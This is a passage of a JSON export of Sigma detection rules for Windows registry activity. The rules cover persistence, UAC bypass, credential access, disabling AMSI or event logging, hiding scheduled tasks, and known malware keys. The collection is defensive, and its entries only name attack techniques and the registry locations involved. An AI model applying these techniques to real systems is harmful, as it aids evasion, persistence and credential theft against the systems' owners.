- { - "description": "A General detection to trigger for the creation or modification of .*\\Software\\Sysinternals\\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.", - "uuid": "9841b233-8df8-4ad7-9133-b0b4402a9014", - "value": "Sysinternals SDelete Registry Keys", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/9", - "https://threathunterplaybook.com/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_sdelete_registry_keys.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2020/05/02", - "filename": "registry_add_sysinternals_sdelete_registry_keys.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. 
It displays the dialog box [\u2026]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "uuid": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", - "value": "Persistence Via Disk Cleanup Handler - NewEntry", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/diskcleanuphandler.html", - "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_set_disk_cleanup_handler_new_entry_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "registry_set_disk_cleanup_handler_new_entry_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate new entry added by windows" - ], - "logsource.category": "registry_add", - "logsource.product": "windows" - } - }, - { - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. 
Which could indicate an attacker trying to launch an encryption process", - "uuid": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", - "value": "Removal Of Folder From ProtectedFolders In Exploit Guard", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/05", - "filename": "registry_delete_exploit_guard_protected_folders.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate administrators removing applications (should always be monitored)" - ], - "logsource.category": "registry_delete", - "logsource.product": "windows" - } - }, - { - "description": "Detects the deletion of registry keys containing the MSTSC connection history", - "uuid": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", - "value": "Terminal Server Client Connection History Cleared", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", - "http://woshub.com/how-to-clear-rdp-connections-history/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1112" - ], - "creation_date": "2021/10/19", - "filename": "registry_delete_mstsc_history_cleared.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_delete", - "logsource.product": "windows" - } - }, - { - "description": "Remove the AMSI Provider registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection", - "uuid": 
"41d1058a-aea7-4952-9293-29eaaf516465", - "value": "Removal Of Amsi Provider Reg Key", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://seclists.org/fulldisclosure/2020/Mar/45", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/06/07", - "filename": "registry_delete_removal_amsi_registry_key.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_delete", - "logsource.product": "windows" - } - }, - { - "description": "A General detection to trigger for processes removing .*\\shell\\open\\command registry keys. Registry keys that might have been used for COM hijacking activities.", - "uuid": "96f697b0-b499-4e5d-9908-a67bec11cdb6", - "value": "Removal of Potential COM Hijacking Registry Keys", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/7", - "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html", - "https://docs.microsoft.com/en-us/windows/win32/shell/launch", - "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", - "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/05/02", - "filename": "registry_delete_removal_com_hijacking_registry_key.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Legitimate software (un)installations are known to cause 
some false positives. Please add them as a filter when encountered" - ], - "logsource.category": "registry_delete", - "logsource.product": "windows" - } - }, - { - "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", - "uuid": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", - "value": "Removal Of Index Value to Hide Schedule Task", - "meta": { - "refs": [ - "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_index_value_scheduled_task_hide.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], - "creation_date": "2022/08/26", - "filename": "registry_delete_removal_index_value_scheduled_task_hide.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_delete", - "logsource.product": "windows" - } - }, - { - "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. 
This technique is used by Tarrask malware", - "uuid": "acd74772-5f88-45c7-956b-6a7b36c294d2", - "value": "Removal Of SD Value to Hide Schedule Task", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], - "creation_date": "2022/04/15", - "filename": "registry_delete_removal_sd_value_scheduled_task_hide.yml", - "author": "Sittikorn S", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_delete", - "logsource.product": "windows" - } - }, - { - "description": "Sysmon registry detection of a local hidden user account.", - "uuid": "460479f3-80b7-42da-9c43-2cc1d54dbccd", - "value": "Creation of a Local Hidden User Account by Registry", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1387530414185664538", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001" - ], - "creation_date": "2021/05/03", - "filename": "registry_event_add_local_hidden_user.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", - "uuid": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", - "value": "Chafer Activity - Registry", - "meta": { - "refs": [ - "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml" - ], - "tags": [ - "attack.persistence", - 
"attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2018/03/23", - "filename": "registry_event_apt_chafer_mar18.yml", - "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "uuid": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "value": "Leviathan Registry Key Activity", - "meta": { - "refs": [ - "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_leviathan.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2020/07/07", - "filename": "registry_event_apt_leviathan.yml", - "author": "Aidan Bracher", - "level": "critical", - "falsepositive": "No established falsepositives", - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "uuid": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "value": "OceanLotus Registry Activity", - "meta": { - "refs": [ - "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", - "https://github.com/eset/malware-ioc/tree/master/oceanlotus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2019/04/14", - "filename": "registry_event_apt_oceanlotus_registry.yml", - "author": "megan201296, Jonhnathan Ribeiro", - "level": 
"critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects Pandemic Windows Implant", - "uuid": "47e0852a-cf81-4494-a8e6-31864f8c86ed", - "value": "Pandemic Registry Key", - "meta": { - "refs": [ - "https://wikileaks.org/vault7/#Pandemic", - "https://twitter.com/MalwareJake/status/870349480356454401", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1105" - ], - "creation_date": "2017/06/01", - "filename": "registry_event_apt_pandemic.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", - "uuid": "6ea3bf32-9680-422d-9f50-e90716b12a66", - "value": "UAC Bypass Via Wsreset", - "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly", - "https://lolbas-project.github.io/lolbas/Binaries/Wsreset", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2020/10/07", - "filename": "registry_event_bypass_via_wsreset.yml", - "author": "oscd.community, Dmitry Uchakin", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "uuid": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "value": 
"CMSTP Execution Registry Event", - "meta": { - "refs": [ - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" - ], - "creation_date": "2018/07/16", - "filename": "registry_event_cmstp_execution_by_registry.yml", - "author": "Nik Seetharaman", - "level": "high", - "falsepositive": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", - "uuid": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", - "value": "Disable Security Events Logging Adding Reg Key MiniNt", - "meta": { - "refs": [ - "https://twitter.com/0gtweet/status/1182516740955226112", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" - ], - "creation_date": "2019/10/25", - "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml", - "author": "Ilyas Ochkov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching 
credentials.\n", - "uuid": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", - "value": "Wdigest CredGuard Registry Modification", - "meta": { - "refs": [ - "https://teamhydra.blog/2020/08/25/bypassing-credential-guard/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2019/08/25", - "filename": "registry_event_disable_wdigest_credential_guard.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "uuid": "5aad0995-46ab-41bd-a9ff-724f41114971", - "value": "Esentutl Volume Shadow Copy Service Keys", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "creation_date": "2020/10/20", - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Windows Credential Editor (WCE)", - "uuid": "a6b33c02-8305-488f-8585-03cb2a7763f2", - "value": "Windows Credential Editor Registry", - "meta": { - "refs": 
[ - "https://www.ampliasecurity.com/research/windows-credentials-editor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" - ], - "creation_date": "2019/12/31", - "filename": "registry_event_hack_wce_reg.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", - "uuid": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", - "value": "HybridConnectionManager Service Installation - Registry", - "meta": { - "refs": [ - "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1608" - ], - "creation_date": "2021/04/12", - "filename": "registry_event_hybridconnectionmgr_svc_installation.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the presence of a registry key created during Azorult execution", - "uuid": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", - "value": "Registry Entries For Azorult Malware", - "meta": { - "refs": [ - "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_azorult.yml" - ], - "tags": [ - "attack.execution", - "attack.t1112" - ], - "creation_date": "2020/05/08", - "filename": 
"registry_event_mal_azorult.yml", - "author": "Trent Liffick", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects FlowCloud malware from threat group TA410.", - "uuid": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "value": "FlowCloud Malware", - "meta": { - "refs": [ - "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_flowcloud.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1112" - ], - "creation_date": "2020/06/09", - "filename": "registry_event_mal_flowcloud.yml", - "author": "NVISO", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "uuid": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", - "value": "PrinterNightmare Mimimkatz Driver Name", - "meta": { - "refs": [ - "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760", - "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204", - "cve.2021.1675", - "cve.2021.34527" - ], - "creation_date": "2021/07/04", - "filename": "registry_event_mimikatz_printernightmare.yml", - "author": "Markus Neis, @markus_neis, Florian Roth", - "level": "critical", - "falsepositive": [ - "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer 
(unlikely)" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects value modification of registry key containing path to binary used as screensaver.", - "uuid": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", - "value": "Path To Screensaver Binary Modified", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", - "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.002" - ], - "creation_date": "2020/10/11", - "filename": "registry_event_modify_screensaver_binary_path.yml", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate modification of screensaver" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "uuid": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "value": "Narrator's Feedback-Hub Persistence", - "meta": { - "refs": [ - "https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_event_narrator_feedback_persistance.yml", - "author": "Dmitriy Lifanov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects NetNTLM downgrade attack", - "uuid": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", - 
"value": "NetNTLM Downgrade Attack - Registry", - "meta": { - "refs": [ - "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" - ], - "creation_date": "2018/03/20", - "filename": "registry_event_net_ntlm_downgrade.yml", - "author": "Florian Roth, wagga", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", - "uuid": "6aa1d992-5925-4e9f-a49b-845e51d1de01", - "value": "New DLL Added to AppCertDlls Registry Key", - "meta": { - "refs": [ - "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", - "https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.009" - ], - "creation_date": "2019/10/25", - "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml", - "author": "Ilyas Ochkov, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", - "uuid": 
"4f84b697-c9ed-4420-8ab5-e09af5b2345d", - "value": "New DLL Added to AppInit_DLLs Registry Key", - "meta": { - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.010" - ], - "creation_date": "2019/10/25", - "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml", - "author": "Ilyas Ochkov, oscd.community, Tim Shelton", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", - "uuid": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", - "value": "Office Application Startup - Office Test", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1137/002/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_test_regadd.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137.002" - ], - "creation_date": "2020/10/25", - "filename": "registry_event_office_test_regadd.yml", - "author": "omkar72", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects persistence registry keys for Recycle Bin", - "uuid": "277efb8f-60be-4f10-b4d3-037802f37167", - "value": "Registry Persistence Mechanisms in Recycle Bin", - "meta": { - "refs": [ - "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", - 
"https://persistence-info.github.io/Data/recyclebin.html", - "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547" - ], - "creation_date": "2021/11/18", - "filename": "registry_event_persistence_recycle_bin.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", - "uuid": "a54f842a-3713-4b45-8c84-5f136fdebd3c", - "value": "PortProxy Registry Key", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", - "https://adepts.of0x.cc/netsh-portproxy-code/", - "https://www.dfirnotes.net/portproxy_detection/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" - ], - "creation_date": "2021/06/22", - "filename": "registry_event_portproxy_registry_key.yml", - "author": "Andreas Hunkeler (@Karneades)", - "level": "medium", - "falsepositive": [ - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. 
https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", - "Synergy Software KVM (https://symless.com/synergy)" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "uuid": "5b175490-b652-4b02-b1de-5b5b4083c5f8", - "value": "RedMimicry Winnti Playbook Registry Manipulation", - "meta": { - "refs": [ - "https://redmimicry.com", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/06/24", - "filename": "registry_event_redmimicry_winnti_reg.yml", - "author": "Alexander Rausch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "uuid": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", - "value": "WINEKEY Registry Modification", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runkey_winekey.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547" - ], - "creation_date": "2020/10/30", - "filename": "registry_event_runkey_winekey.yml", - "author": "omkar72", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Rule to detect the configuration of Run Once registry key. 
Configured payload can be run by runonce.exe /AlternateShellStartup", - "uuid": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", - "value": "Run Once Task Configuration in Registry", - "meta": { - "refs": [ - "https://twitter.com/pabraeken/status/990717080805789697", - "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/11/15", - "filename": "registry_event_runonce_persistence.yml", - "author": "Avneet Singh @v3t0_, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate modification of the registry key by legitimate program" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. 
UACMe 33 or 62)", - "uuid": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", - "value": "Shell Open Registry Keys Manipulation", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", - "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", - "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" - ], - "creation_date": "2021/08/30", - "filename": "registry_event_shell_open_keys_manipulation.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects changes to the Registry in which a monitor program gets 